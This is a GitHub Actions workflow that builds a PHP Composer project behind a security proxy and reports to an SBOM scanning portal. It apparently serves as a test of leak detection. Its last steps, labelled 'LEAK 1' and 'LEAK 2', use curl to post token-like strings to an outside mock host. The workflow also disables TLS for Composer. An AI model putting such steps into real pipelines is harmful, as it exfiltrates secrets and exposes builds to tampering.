Update Secrets.yml #5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| name: Build COMPOSER Package for Secrets | |
| on: | |
| push: | |
| branches: [ main ] | |
| pull_request: | |
| branches: [ main ] | |
| permissions: | |
| checks: write | |
| contents: read | |
| packages: read | |
| env: | |
| API_URL: https://app.stage.veribom.com | |
| jobs: | |
| create_scan_in_IR_Portal: | |
| runs-on: ubuntu-latest | |
| outputs: | |
| scan_id: ${{ steps.parseResponse.outputs.scan_id }} | |
| steps: | |
| - name: Initiating SBOM Scan | |
| id: createScan | |
| uses: fjogeleit/http-request-action@v1.15.1 | |
| with: | |
| url: '${{env.API_URL}}/utilityapi/v1/scan' | |
| method: 'POST' | |
| data: '{"api_key": "${{secrets.VB_API_KEY_STAGE}}"}' | |
| - name: Parse Response | |
| id: parseResponse | |
| run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT" | |
| ecr_details: | |
| runs-on: ubuntu-latest | |
| outputs: | |
| ecr_username: ${{steps.ecr_details.outputs.username}} | |
| ecr_token: ${{steps.ecr_details.outputs.token}} | |
| ecr_region: ${{steps.ecr_details.outputs.region}} | |
| ecr_id: ${{steps.ecr_details.outputs.registry_id}} | |
| steps: | |
| - name: Fetching VB Token | |
| id: fetchECRDetails | |
| uses: fjogeleit/http-request-action@v1.15.1 | |
| with: | |
| url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_STAGE}}' | |
| method: 'GET' | |
| - name: Decoding VB Token | |
| id: parseToken | |
| run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT" | |
| - name: ECR Details | |
| id: ecr_details | |
| run: | | |
| echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT" | |
| echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT" | |
| echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT" | |
| echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT" | |
| start_proxy_and_build: | |
| runs-on: ubuntu-latest | |
| needs: [create_scan_in_IR_Portal, ecr_details] | |
| services: | |
| pse: | |
| image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test | |
| credentials: | |
| username: ${{needs.ecr_details.outputs.ecr_username}} | |
| password: ${{needs.ecr_details.outputs.ecr_token}} | |
| env: | |
| PSE_DEBUG_FLAG: --alsologtostderr | |
| POLICY_LOG: t | |
| INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_STAGE}} | |
| INVISIRISK_PORTAL: https://app.stage.veribom.com | |
| GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} | |
| container: | |
| image: ubuntu:latest | |
| options: --cap-add=NET_ADMIN | |
| steps: | |
| - name: Checkout the code | |
| uses: actions/checkout@v3 | |
| - name: Install curl | |
| run: | | |
| apt-get update | |
| apt-get install -y curl | |
| - name: Set up PHP | |
| uses: shivammathur/setup-php@v2 | |
| with: | |
| php-version: "8.2" | |
| extensions: pdo, pdo_mysql, gd | |
| - name: Install system dependencies | |
| run: | | |
| sudo apt-get update | |
| sudo apt-get install -y libpng-dev libjpeg-dev libfreetype6-dev zip unzip git apache2 | |
| - name: Install Composer | |
| run: | | |
| php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" | |
| php composer-setup.php --install-dir=/usr/local/bin --filename=composer | |
| php -r "unlink('composer-setup.php');" | |
| #continue-on-error: false # This will cause the step to fail if Composer installation fails | |
| - name: Disable tls | |
| run: | | |
| composer config --global disable-tls true | |
| - name: Run PSE Action | |
| uses: invisirisk/pse-action@v1.0.8 | |
| with: | |
| github-token: ${{ secrets.GITHUB_TOKEN }} | |
| SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }} | |
| - name: Configure CA Certificates | |
| run: | | |
| # Extract the path of the php.ini file | |
| PHP_INI=$(php --ini | grep "Loaded Configuration File" | awk '{print $4}') | |
| echo "$PHP_INI" | |
| echo "curl.cainfo=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI" | |
| echo "openssl.cafile=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI" | |
| - name: User http for packagist | |
| run: composer config -g repo.packagist composer http://repo.packagist.org | |
| - name: Install project dependencies | |
| run: | | |
| composer install --no-scripts --no-autoloader --prefer-dist --no-cache | |
| #continue-on-error: false # This will stop the workflow if install fails | |
| - name: Generate optimized autoload files | |
| run: composer dump-autoload --optimize | |
| - name: Set permissions | |
| run: sudo chown -R www-data:www-data . | |
| - name: Enable Apache mod_rewrite | |
| run: sudo a2enmod rewrite | |
| - name: Start Apache (if needed) | |
| run: | | |
| sudo service apache2 start | |
| sudo apache2ctl configtest | |
| - name: Send POST request with GitHub token (LEAK 1) | |
| run: | | |
| curl -k -X POST https://vbirmock.free.beeceptor.com/hack \ | |
| -H "Content-Type: application/json" \ | |
| -d '{ | |
| "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX" | |
| }' | |
| - name: Make API Request (LEAK 2) | |
| run: | | |
| curl -k -X POST https://api.github.com/endpoint \ | |
| -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}' |